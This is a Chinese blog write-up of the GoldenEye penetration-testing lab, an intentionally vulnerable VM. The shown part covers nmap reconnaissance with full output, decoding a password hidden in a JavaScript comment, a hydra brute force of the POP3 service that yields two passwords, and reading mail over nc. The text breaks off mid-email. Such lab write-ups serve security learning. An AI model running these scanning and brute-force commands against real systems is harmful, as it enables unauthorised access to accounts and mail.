<!DOCTYPE html>
<html lang="zh-CN">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#222">
<meta name="generator" content="Hexo 4.2.0">
  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png">
  <link rel="mask-icon" href="/images/logo.svg" color="#222">

<link rel="stylesheet" href="/css/main.css">


<link rel="stylesheet" href="/lib/font-awesome/css/all.min.css">

<script id="hexo-configurations">
    var NexT = window.NexT || {};
    var CONFIG = {"hostname":"tacgib.cn","root":"/","scheme":"Gemini","version":"7.8.0","exturl":false,"sidebar":{"position":"left","display":"post","padding":18,"offset":12,"onmobile":true},"copycode":{"enable":false,"show_result":false,"style":null},"back2top":{"enable":true,"sidebar":false,"scrollpercent":false},"bookmark":{"enable":false,"color":"#222","save":"auto"},"fancybox":false,"mediumzoom":false,"lazyload":false,"pangu":false,"comments":{"style":"tabs","active":null,"storage":true,"lazyload":false,"nav":null},"algolia":{"hits":{"per_page":10},"labels":{"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}},"localsearch":{"enable":false,"trigger":"auto","top_n_per_article":1,"unescape":false,"preload":false},"motion":{"enable":true,"async":true,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}}};
  </script>

  <meta name="description" content="提升一下自己的渗透测试技术水平，提高认知，才能有能力在该领域做好一些事情，希望能够有所收获。 本次记录靶场练习笔记，包含有环境配置、主机端口及服务扫描、一步步信息收集、pop3邮箱账号爆破、nc连接pop3并读取邮件信息、获取通过隐写术加载在图片中的信息、编解码操作、漏洞搜索与利用策略、MSF漏洞利用获取shell、后台命令执行结合nc获取shell、内核提权、查找隐藏flag等。">
<meta property="og:type" content="article">
<meta property="og:title" content="渗透靶场笔记1：GoldenEye">
<meta property="og:url" content="https://tacgib.cn/2023/01/06/%E6%B8%97%E9%80%8F%E9%9D%B6%E5%9C%BA%E7%AC%94%E8%AE%B01%EF%BC%9AGoldenEye/index.html">
<meta property="og:site_name" content="TACGIB CLUB">
<meta property="og:description" content="提升一下自己的渗透测试技术水平，提高认知，才能有能力在该领域做好一些事情，希望能够有所收获。 本次记录靶场练习笔记，包含有环境配置、主机端口及服务扫描、一步步信息收集、pop3邮箱账号爆破、nc连接pop3并读取邮件信息、获取通过隐写术加载在图片中的信息、编解码操作、漏洞搜索与利用策略、MSF漏洞利用获取shell、后台命令执行结合nc获取shell、内核提权、查找隐藏flag等。">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="http://zhengjie.ren/%E5%B0%8F%E4%B9%A6%E5%8C%A0/1672757255452.png">
<meta property="og:image" content="http://zhengjie.ren/%E5%B0%8F%E4%B9%A6%E5%8C%A0/1672757682586.png">
<meta property="og:image" content="http://zhengjie.ren/%E5%B0%8F%E4%B9%A6%E5%8C%A0/1672756687713.png">
<meta property="og:image" content="http://zhengjie.ren/%E5%B0%8F%E4%B9%A6%E5%8C%A0/1672756950558.png">
<meta property="og:image" content="http://zhengjie.ren/%E5%B0%8F%E4%B9%A6%E5%8C%A0/1672758130430.png">
<meta property="og:image" content="http://zhengjie.ren/%E5%B0%8F%E4%B9%A6%E5%8C%A0/1672758761222.png">
<meta property="og:image" content="http://zhengjie.ren/%E5%B0%8F%E4%B9%A6%E5%8C%A0/1672759519072.png">
<meta property="og:image" content="http://zhengjie.ren/%E5%B0%8F%E4%B9%A6%E5%8C%A0/1672759660083.png">
<meta property="og:image" content="http://zhengjie.ren/%E5%B0%8F%E4%B9%A6%E5%8C%A0/1672759987695.png">
<meta property="og:image" content="http://zhengjie.ren/%E5%B0%8F%E4%B9%A6%E5%8C%A0/1672760085870.png">
<meta property="og:image" content="http://zhengjie.ren/%E5%B0%8F%E4%B9%A6%E5%8C%A0/1672760290017.png">
<meta property="og:image" content="http://zhengjie.ren/%E5%B0%8F%E4%B9%A6%E5%8C%A0/1672760996081.png">
<meta property="og:image" content="http://zhengjie.ren/%E5%B0%8F%E4%B9%A6%E5%8C%A0/1672761288814.png">
<meta property="og:image" content="http://zhengjie.ren/%E5%B0%8F%E4%B9%A6%E5%8C%A0/1672761719620.png">
<meta property="og:image" content="http://zhengjie.ren/%E5%B0%8F%E4%B9%A6%E5%8C%A0/1672761939426.png">
<meta property="og:image" content="http://zhengjie.ren/%E5%B0%8F%E4%B9%A6%E5%8C%A0/1672762507066.png">
<meta property="og:image" content="http://zhengjie.ren/%E5%B0%8F%E4%B9%A6%E5%8C%A0/1672762593799.png">
<meta property="og:image" content="http://zhengjie.ren/%E5%B0%8F%E4%B9%A6%E5%8C%A0/1672763024750.png">
<meta property="og:image" content="http://zhengjie.ren/%E5%B0%8F%E4%B9%A6%E5%8C%A0/1672763800034.png">
<meta property="og:image" content="http://zhengjie.ren/%E5%B0%8F%E4%B9%A6%E5%8C%A0/1672765426878.png">
<meta property="og:image" content="http://zhengjie.ren/%E5%B0%8F%E4%B9%A6%E5%8C%A0/1672765585233.png">
<meta property="og:image" content="http://zhengjie.ren/%E5%B0%8F%E4%B9%A6%E5%8C%A0/1672766110936.png">
<meta property="og:image" content="http://zhengjie.ren/%E5%B0%8F%E4%B9%A6%E5%8C%A0/1672844837526.png">
<meta property="og:image" content="http://zhengjie.ren/%E5%B0%8F%E4%B9%A6%E5%8C%A0/1672845097713.png">
<meta property="og:image" content="http://zhengjie.ren/%E5%B0%8F%E4%B9%A6%E5%8C%A0/1672845479239.png">
<meta property="og:image" content="http://zhengjie.ren/%E5%B0%8F%E4%B9%A6%E5%8C%A0/1672845531484.png">
<meta property="og:image" content="http://zhengjie.ren/%E5%B0%8F%E4%B9%A6%E5%8C%A0/1672845753163.png">
<meta property="og:image" content="http://zhengjie.ren/%E5%B0%8F%E4%B9%A6%E5%8C%A0/1672846127255.png">
<meta property="og:image" content="http://zhengjie.ren/%E5%B0%8F%E4%B9%A6%E5%8C%A0/1672846254118.png">
<meta property="og:image" content="http://zhengjie.ren/%E5%B0%8F%E4%B9%A6%E5%8C%A0/1672846394728.png">
<meta property="og:image" content="http://zhengjie.ren/%E5%B0%8F%E4%B9%A6%E5%8C%A0/1672846914992.png">
<meta property="og:image" content="http://zhengjie.ren/%E5%B0%8F%E4%B9%A6%E5%8C%A0/1672846975952.png">
<meta property="og:image" content="http://zhengjie.ren/%E5%B0%8F%E4%B9%A6%E5%8C%A0/1672847177987.png">
<meta property="og:image" content="http://zhengjie.ren/%E5%B0%8F%E4%B9%A6%E5%8C%A0/1672847577253.png">
<meta property="og:image" content="http://zhengjie.ren/%E5%B0%8F%E4%B9%A6%E5%8C%A0/1672847680795.png">
<meta property="og:image" content="http://zhengjie.ren/%E5%B0%8F%E4%B9%A6%E5%8C%A0/1672848003787.png">
<meta property="og:image" content="http://zhengjie.ren/%E5%B0%8F%E4%B9%A6%E5%8C%A0/1672848181415.png">
<meta property="og:image" content="http://zhengjie.ren/%E5%B0%8F%E4%B9%A6%E5%8C%A0/1672848227455.png">
<meta property="og:image" content="http://zhengjie.ren/%E5%B0%8F%E4%B9%A6%E5%8C%A0/1672848334247.png">
<meta property="og:image" content="http://zhengjie.ren/%E5%B0%8F%E4%B9%A6%E5%8C%A0/1672848616610.png">
<meta property="og:image" content="http://zhengjie.ren/%E5%B0%8F%E4%B9%A6%E5%8C%A0/1672848970306.png">
<meta property="og:image" content="http://zhengjie.ren/%E5%B0%8F%E4%B9%A6%E5%8C%A0/1672850247587.png">
<meta property="og:image" content="http://zhengjie.ren/%E5%B0%8F%E4%B9%A6%E5%8C%A0/1672850201120.png">
<meta property="og:image" content="http://zhengjie.ren/%E5%B0%8F%E4%B9%A6%E5%8C%A0/1672850301289.png">
<meta property="og:image" content="http://zhengjie.ren/%E5%B0%8F%E4%B9%A6%E5%8C%A0/1672929781166.png">
<meta property="og:image" content="http://zhengjie.ren/%E5%B0%8F%E4%B9%A6%E5%8C%A0/1672931315571.png">
<meta property="og:image" content="http://zhengjie.ren/%E5%B0%8F%E4%B9%A6%E5%8C%A0/1672931520579.png">
<meta property="og:image" content="http://zhengjie.ren/%E5%B0%8F%E4%B9%A6%E5%8C%A0/1672931116990.png">
<meta property="og:image" content="http://zhengjie.ren/%E5%B0%8F%E4%B9%A6%E5%8C%A0/1672932063361.png">
<meta property="og:image" content="http://zhengjie.ren/%E5%B0%8F%E4%B9%A6%E5%8C%A0/1672932294513.png">
<meta property="og:image" content="http://zhengjie.ren/%E5%B0%8F%E4%B9%A6%E5%8C%A0/1672932554011.png">
<meta property="og:image" content="http://zhengjie.ren/%E5%B0%8F%E4%B9%A6%E5%8C%A0/1672932745321.png">
<meta property="og:image" content="http://zhengjie.ren/%E5%B0%8F%E4%B9%A6%E5%8C%A0/1672932789172.png">
<meta property="article:published_time" content="2023-01-05T16:14:54.075Z">
<meta property="article:modified_time" content="2023-01-05T16:15:08.559Z">
<meta property="article:author" content="秋风木叶">
<meta property="article:tag" content="小书匠,渗透测试,笔记,靶场,学习">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="http://zhengjie.ren/%E5%B0%8F%E4%B9%A6%E5%8C%A0/1672757255452.png">

<link rel="canonical" href="https://tacgib.cn/2023/01/06/%E6%B8%97%E9%80%8F%E9%9D%B6%E5%9C%BA%E7%AC%94%E8%AE%B01%EF%BC%9AGoldenEye/">


<script id="page-configurations">
  // https://hexo.io/docs/variables.html
  CONFIG.page = {
    sidebar: "",
    isHome : false,
    isPost : true,
    lang   : 'zh-CN'
  };
</script>

  <title>渗透靶场笔记1：GoldenEye | TACGIB CLUB</title>
  






  <noscript>
  <style>
  .use-motion .brand,
  .use-motion .menu-item,
  .sidebar-inner,
  .use-motion .post-block,
  .use-motion .pagination,
  .use-motion .comments,
  .use-motion .post-header,
  .use-motion .post-body,
  .use-motion .collection-header { opacity: initial; }

  .use-motion .site-title,
  .use-motion .site-subtitle {
    opacity: initial;
    top: initial;
  }

  .use-motion .logo-line-before i { left: initial; }
  .use-motion .logo-line-after i { right: initial; }
  </style>
</noscript>

  
  <script type="text/javascript" src="/js/my_js/clicklove.js"></script>
</head>

<body itemscope itemtype="http://schema.org/WebPage">
  <div class="container use-motion">
    <div class="headband"></div>

    <header class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="切换导航栏">
      <span class="toggle-line toggle-line-first"></span>
      <span class="toggle-line toggle-line-middle"></span>
      <span class="toggle-line toggle-line-last"></span>
    </div>
  </div>

  <div class="site-meta">

    <a href="/" class="brand" rel="start">
      <span class="logo-line-before"><i></i></span>
      <h1 class="site-title">TACGIB CLUB</h1>
      <span class="logo-line-after"><i></i></span>
    </a>
      <p class="site-subtitle" itemprop="description">云影时空</p>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger">
    </div>
  </div>
</div>




<nav class="site-nav">
  <ul id="menu" class="main-menu menu">
        <li class="menu-item menu-item-home">

    <a href="/" rel="section"><i class="fa fa-home fa-fw"></i>首页</a>

  </li>
        <li class="menu-item menu-item-about">

    <a href="/about/" rel="section"><i class="fa fa-user fa-fw"></i>关于</a>

  </li>
        <li class="menu-item menu-item-tags">

    <a href="/tags/" rel="section"><i class="fa fa-tags fa-fw"></i>标签<span class="badge">93</span></a>

  </li>
        <li class="menu-item menu-item-archives">

    <a href="/archives/" rel="section"><i class="fa fa-archive fa-fw"></i>归档<span class="badge">91</span></a>

  </li>
  </ul>
</nav>




</div>
    </header>

    
  <div class="back-to-top">
    <i class="fa fa-arrow-up"></i>
    <span>0%</span>
  </div>


    <main class="main">
      <div class="main-inner">
        <div class="content-wrap">
          

          <div class="content post posts-expand">
            

    
  
  
  <article itemscope itemtype="http://schema.org/Article" class="post-block" lang="zh-CN">
    <link itemprop="mainEntityOfPage" href="https://tacgib.cn/2023/01/06/%E6%B8%97%E9%80%8F%E9%9D%B6%E5%9C%BA%E7%AC%94%E8%AE%B01%EF%BC%9AGoldenEye/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/images/avatar.gif">
      <meta itemprop="name" content="秋风木叶">
      <meta itemprop="description" content="一片宁静自由的空间……">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="TACGIB CLUB">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          渗透靶场笔记1：GoldenEye
        </h1>

        <div class="post-meta">
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-calendar"></i>
              </span>
              <span class="post-meta-item-text">发表于</span>
              

              <time title="创建时间：2023-01-06 00:14:54 / 修改时间：00:15:08" itemprop="dateCreated datePublished" datetime="2023-01-06T00:14:54+08:00">2023-01-06</time>
            </span>

          
            <span id="/2023/01/06/%E6%B8%97%E9%80%8F%E9%9D%B6%E5%9C%BA%E7%AC%94%E8%AE%B01%EF%BC%9AGoldenEye/" class="post-meta-item leancloud_visitors" data-flag-title="渗透靶场笔记1：GoldenEye" title="阅读次数">
              <span class="post-meta-item-icon">
                <i class="fa fa-eye"></i>
              </span>
              <span class="post-meta-item-text">阅读次数：</span>
              <span class="leancloud-visitors-count"></span>
            </span>
  
  <span class="post-meta-item">
    
      <span class="post-meta-item-icon">
        <i class="far fa-comment"></i>
      </span>
      <span class="post-meta-item-text">Valine：</span>
    
    <a title="valine" href="/2023/01/06/%E6%B8%97%E9%80%8F%E9%9D%B6%E5%9C%BA%E7%AC%94%E8%AE%B01%EF%BC%9AGoldenEye/#valine-comments" itemprop="discussionUrl">
      <span class="post-comments-count valine-comment-count" data-xid="/2023/01/06/%E6%B8%97%E9%80%8F%E9%9D%B6%E5%9C%BA%E7%AC%94%E8%AE%B01%EF%BC%9AGoldenEye/" itemprop="commentCount"></span>
    </a>
  </span>
  
  

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody">

      
        <p>提升一下自己的渗透测试技术水平，提高认知，才能有能力在该领域做好一些事情，希望能够有所收获。</p>
<p>本次记录靶场练习笔记，包含有环境配置、主机端口及服务扫描、一步步信息收集、pop3邮箱账号爆破、nc连接pop3并读取邮件信息、获取通过隐写术加载在图片中的信息、编解码操作、漏洞搜索与利用策略、MSF漏洞利用获取shell、后台命令执行结合nc获取shell、内核提权、查找隐藏flag等。</p>
<a id="more"></a>
<h1 id="一、环境配置"><a href="#一、环境配置" class="headerlink" title="一、环境配置"></a>一、环境配置</h1><h2 id="1-1-虚拟机网络配置"><a href="#1-1-虚拟机网络配置" class="headerlink" title="1.1 虚拟机网络配置"></a>1.1 虚拟机网络配置</h2><p>虚拟网卡设置，配置VMnet1网卡IP为172.16.50.1/24</p>
<p><img src="http://zhengjie.ren/%E5%B0%8F%E4%B9%A6%E5%8C%A0/1672757255452.png" alt=""></p>
<p>VM中点击编辑-打开虚拟网络编辑器，点击右下角更改设置，选择VMnet1，选择仅主机模式，子网IP配置为：172.16.50.0/24，点击DHCP设置，配置分配地址范围为：172.16.50.128-172.16.50.200<br><img src="http://zhengjie.ren/%E5%B0%8F%E4%B9%A6%E5%8C%A0/1672757682586.png" alt=""><br>kali网络配置，设置为自定义：特定啊虚拟网络，网卡选择VMnet1（仅主机模式）<br><img src="http://zhengjie.ren/%E5%B0%8F%E4%B9%A6%E5%8C%A0/1672756687713.png" alt=""></p>
<p>GoldenEye靶机网络配置，设置为自定义：特定啊虚拟网络，网卡选择VMnet1（仅主机模式）<br><img src="http://zhengjie.ren/%E5%B0%8F%E4%B9%A6%E5%8C%A0/1672756950558.png" alt=""></p>
<h2 id="1-2-测试网络配置"><a href="#1-2-测试网络配置" class="headerlink" title="1.2 测试网络配置"></a>1.2 测试网络配置</h2><p>启动kali<br><img src="http://zhengjie.ren/%E5%B0%8F%E4%B9%A6%E5%8C%A0/1672758130430.png" alt=""></p>
<p>kali本机Ip为172.16.50.128/24，网络配置完成<br><img src="http://zhengjie.ren/%E5%B0%8F%E4%B9%A6%E5%8C%A0/1672758761222.png" alt=""></p>
<h1 id="二、打靶记录"><a href="#二、打靶记录" class="headerlink" title="二、打靶记录"></a>二、打靶记录</h1><h2 id="2-1-靶机ip获取"><a href="#2-1-靶机ip获取" class="headerlink" title="2.1 靶机ip获取"></a>2.1 靶机ip获取</h2><p>sudo nmap -sS -sV -T5 -A 172.16.50.0/24，稍等片刻</p>
<div class="highlight-wrap"autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true"data-rel="BASH"><figure class="iseeu highlight /bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br></pre></td><td class="code"><pre><span class="line">─(kali㉿kali)-[~]</span><br><span class="line">└─$ sudo nmap -sS -sV -T5 -A 172.16.50.0/24                                               127 ⨯</span><br><span class="line">[sudo] password <span class="keyword">for</span> kali: </span><br><span class="line">Starting Nmap 7.91 ( https://nmap.org ) at 2023-01-03 23:16 CST</span><br><span class="line">mass_dns: warning: Unable to determine any DNS servers. Reverse DNS is disabled. Try using --system-dns or specify valid servers with --dns-servers</span><br><span class="line">Nmap scan report <span class="keyword">for</span> 172.16.50.129</span><br><span class="line">Host is up (0.0018s latency).</span><br><span class="line">Not shown: 998 closed ports</span><br><span class="line">PORT   STATE SERVICE VERSION</span><br><span class="line">25/tcp open  smtp</span><br><span class="line">| fingerprint-strings: </span><br><span class="line">|   Hello: </span><br><span class="line">|     220 ubuntu GoldentEye SMTP Electronic-Mail agent</span><br><span class="line">|_    Syntax: EHLO hostname</span><br><span class="line">|_smtp-commands: ubuntu, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN, </span><br><span class="line">80/tcp open  http    Apache httpd 2.4.7 ((Ubuntu))</span><br><span class="line">|_http-server-header: Apache/2.4.7 (Ubuntu)</span><br><span class="line">|_http-title: GoldenEye Primary Admin Server</span><br><span class="line">1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :</span><br><span class="line">SF-Port25-TCP:V=7.91%I=7%D=1/3%Time=63B446D8%P=x86_64-pc-linux-gnu%r(Hello</span><br><span class="line">SF:,4D,<span class="string">"220\x20ubuntu\x20GoldentEye\x20SMTP\x20Electronic-Mail\x20agent\r\</span></span><br><span class="line"><span class="string">SF:n501\x20Syntax:\x20EHLO\x20hostname\r\n"</span>);</span><br><span class="line">MAC Address: 00:0C:29:6F:D3:9E (VMware)</span><br><span class="line">Device <span class="built_in">type</span>: general purpose</span><br><span class="line">Running: Linux 3.X|4.X</span><br><span class="line">OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4</span><br><span class="line">OS details: Linux 3.2 - 4.9</span><br><span class="line">Network Distance: 1 hop</span><br><span class="line"></span><br><span class="line">TRACEROUTE</span><br><span class="line">HOP RTT     ADDRESS</span><br><span class="line">1   1.81 ms 172.16.50.129</span><br><span class="line"></span><br><span class="line">Nmap scan report <span class="keyword">for</span> 172.16.50.200</span><br><span class="line">Host is up (0.00023s latency).</span><br><span class="line">All 1000 scanned ports on 172.16.50.200 are filtered</span><br><span class="line">MAC Address: 00:50:56:F6:99:1D (VMware)</span><br><span class="line">Too many fingerprints match this host to give specific OS details</span><br><span class="line">Network Distance: 1 hop</span><br><span class="line"></span><br><span class="line">TRACEROUTE</span><br><span class="line">HOP RTT     ADDRESS</span><br><span class="line">1   0.23 ms 172.16.50.200</span><br><span class="line"></span><br><span class="line">Nmap scan report <span class="keyword">for</span> 172.16.50.128</span><br><span class="line">Host is up (0.000056s latency).</span><br><span class="line">All 1000 scanned ports on 172.16.50.128 are closed</span><br><span class="line">Too many fingerprints match this host to give specific OS details</span><br><span class="line">Network Distance: 0 hops</span><br><span class="line"></span><br><span class="line">OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .</span><br><span class="line">Nmap <span class="keyword">done</span>: 256 IP addresses (3 hosts up) scanned <span class="keyword">in</span> 81.02 seconds</span><br><span class="line">                                                                                                </span><br><span class="line">┌──(kali㉿kali)-[~]</span><br><span class="line">└─$</span><br></pre></td></tr></table></figure></div>
<p>发现靶机ip为172.16.50.129，且开启25和80端口<br><img src="http://zhengjie.ren/%E5%B0%8F%E4%B9%A6%E5%8C%A0/1672759519072.png" alt=""></p>
<h2 id="2-2-进一步信息收集"><a href="#2-2-进一步信息收集" class="headerlink" title="2.2 进一步信息收集"></a>2.2 进一步信息收集</h2><p>访问80端口，<a href="http://172.16.50.129/" target="_blank" rel="noopener">http://172.16.50.129/</a><br>获取到如下线索：<br>Severnaya Auxiliary Control Station<br><strong><strong>TOP SECRET ACCESS</strong></strong><br>Accessing Server Identity<br>Server Name:………………..<br>GOLDENEYE</p>
<p>User: UNKNOWN<br>Naviagate to /sev-home/ to login<br><img src="http://zhengjie.ren/%E5%B0%8F%E4%B9%A6%E5%8C%A0/1672759660083.png" alt=""></p>
<p>根据线索，我们通过 /sev-home/ 尝试登录，<a href="http://172.16.50.129/sev-home/" target="_blank" rel="noopener">http://172.16.50.129/sev-home/</a><br>显示登录页面，但是没有账号，我们尝试在页面代码中寻找线索<br><img src="http://zhengjie.ren/%E5%B0%8F%E4%B9%A6%E5%8C%A0/1672759987695.png" alt=""><br>发现存在/terminal.js文件，我们打开查看其内容<br>view-source:<a href="http://172.16.50.129/terminal.js" target="_blank" rel="noopener">http://172.16.50.129/terminal.js</a><br><img src="http://zhengjie.ren/%E5%B0%8F%E4%B9%A6%E5%8C%A0/1672760085870.png" alt=""></p>
<div class="highlight-wrap"autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true"data-rel="JAVASCRIPT"><figure class="iseeu highlight /javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">//</span></span><br><span class="line"><span class="comment">//Boris, make sure you update your default password. </span></span><br><span class="line"><span class="comment">//My sources say MI6 maybe planning to infiltrate. </span></span><br><span class="line"><span class="comment">//Be on the lookout for any suspicious network traffic....</span></span><br><span class="line"><span class="comment">//</span></span><br><span class="line"><span class="comment">//I encoded you p@ssword below...</span></span><br><span class="line"><span class="comment">//</span></span><br><span class="line"><span class="comment">//&amp;#73;&amp;#110;&amp;#118;&amp;#105;&amp;#110;&amp;#99;&amp;#105;&amp;#98;&amp;#108;&amp;#101;&amp;#72;&amp;#97;&amp;#99;&amp;#107;&amp;#51;&amp;#114;</span></span><br><span class="line"><span class="comment">//</span></span><br><span class="line"><span class="comment">//BTW Natalya says she can break your codes</span></span><br><span class="line"><span class="comment">//</span></span><br></pre></td></tr></table></figure></div>
<p><img src="http://zhengjie.ren/%E5%B0%8F%E4%B9%A6%E5%8C%A0/1672760290017.png" alt=""></p>
<p>发现两个用户名Boris、Natalya<br>和一串HTML编码的口令：&#73;&#110;&#118;&#105;&#110;&#99;&#105;&#98;&#108;&#101;&#72;&#97; &#99;&#107;&#51;&#114;</p>
<p>用BP解码查看口令：InvincibleHack3r<br><img src="http://zhengjie.ren/%E5%B0%8F%E4%B9%A6%E5%8C%A0/1672760996081.png" alt=""><br>尝试获取的用户名和口令登录<a href="http://172.16.50.129/sev-home/" target="_blank" rel="noopener">http://172.16.50.129/sev-home/</a><br>boris/InvincibleHack3r<br><img src="http://zhengjie.ren/%E5%B0%8F%E4%B9%A6%E5%8C%A0/1672761288814.png" alt=""></p>
<p>&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;<br>GoldenEye 是一项绝密的苏联轨道武器项目。 由于您有权访问，您肯定拥有最高机密许可并有资格成为经过认证的 GoldenEye 网络运营商 (GNO)</p>
<p>请发送电子邮件给合格的 GNO 主管，以接收在线 GoldenEye 操作员培训，成为 GoldenEye 系统的管理员</p>
<p>请记住，由于默默无闻的安全性非常有效，我们已将 pop3 服务配置为在非常高的非默认端口上运行<br>&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;<br>可以知道服务器上存在pop3服务，且在非默认端口上，我们尝试对靶机进行全端口扫描<br>sudo nmap -p- 172.16.50.129<br>存在55006和55007两个高端口<br><img src="http://zhengjie.ren/%E5%B0%8F%E4%B9%A6%E5%8C%A0/1672761719620.png" alt=""></p>
<p>我们扫描端口开放服务的详细信息<br>sudo nmap -sS -sV -T5 -A -p55006,55007 172.16.50.129<br><img src="http://zhengjie.ren/%E5%B0%8F%E4%B9%A6%E5%8C%A0/1672761939426.png" alt=""></p>
<p>发现pop3服务在55007端口上</p>
<h2 id="2-3-爆破邮箱账号，获取邮件信息"><a href="#2-3-爆破邮箱账号，获取邮件信息" class="headerlink" title="2.3 爆破邮箱账号，获取邮件信息"></a>2.3 爆破邮箱账号，获取邮件信息</h2><p>我们尝试用现有的两个用户名爆破邮箱口令。<br>sudo echo -e ‘natalya\nboris’ &gt; frank.txt<br>sudo hydra -L frank.txt -P /usr/share/wordlists/fasttrack.txt 172.16.50.129 -s 55007 pop3<br><img src="http://zhengjie.ren/%E5%B0%8F%E4%B9%A6%E5%8C%A0/1672762507066.png" alt=""><br><img src="http://zhengjie.ren/%E5%B0%8F%E4%B9%A6%E5%8C%A0/1672762593799.png" alt=""></p>
<p>[55007][pop3] host: 172.16.50.129   login: natalya   password: bird<br>[55007][pop3] host: 172.16.50.129   login: boris   password: secret1!<br>用户1：boris/secret1!<br>用户2：natalya/bird</p>
<p>使用nc读取账号中的邮件内容：sudo nc 172.16.50.129 55007<br><img src="http://zhengjie.ren/%E5%B0%8F%E4%B9%A6%E5%8C%A0/1672763024750.png" alt=""></p>
<p>+OK GoldenEye POP3 Electronic-Mail System<br>user boris<br>+OK<br>pass secret1!<br>+OK Logged in.<br>list<br>+OK 3 messages:<br>1 544<br>2 373<br>3 921<br>.<br>retr 1<br>+OK 544 octets<br>Return-Path: <a href="mailto:&#x72;&#x6f;&#x6f;&#x74;&#x40;&#x31;&#x32;&#55;&#x2e;&#48;&#x2e;&#48;&#x2e;&#x31;&#x2e;&#103;&#111;&#x6c;&#x64;&#101;&#x6e;&#x65;&#121;&#101;">&#x72;&#x6f;&#x6f;&#x74;&#x40;&#x31;&#x32;&#55;&#x2e;&#48;&#x2e;&#48;&#x2e;&#x31;&#x2e;&#103;&#111;&#x6c;&#x64;&#101;&#x6e;&#x65;&#121;&#101;</a><br>X-Original-To: boris<br>Delivered-To: boris@ubuntu<br>Received: from ok (localhost [127.0.0.1])<br>        by ubuntu (Postfix) with SMTP id D9E47454B1<br>        for <boris>; Tue, 2 Apr 1990 19:22:14 -0700 (PDT)<br>Message-Id: &lt;20180425022326.D9E47454B1@ubuntu&gt;<br>Date: Tue, 2 Apr 1990 19:22:14 -0700 (PDT)<br>From: <a href="mailto:root@127.0.0.1.goldeneye">root@127.0.0.1.goldeneye</a></p>
<p>Boris, this is admin. You can electronically communicate to co-workers and students here. I’m not going to scan emails for security risks because I trust you and the other admins here.<br>.<br>retr 2<br>+OK 373 octets<br>Return-Path: &lt;natalya@ubuntu&gt;<br>X-Original-To: boris<br>Delivered-To: boris@ubuntu<br>Received: from ok (localhost [127.0.0.1])<br>        by ubuntu (Postfix) with ESMTP id C3F2B454B1<br>        for <boris>; Tue, 21 Apr 1995 19:42:35 -0700 (PDT)<br>Message-Id: &lt;20180425024249.C3F2B454B1@ubuntu&gt;<br>Date: Tue, 21 Apr 1995 19:42:35 -0700 (PDT)<br>From: natalya@ubuntu</p>
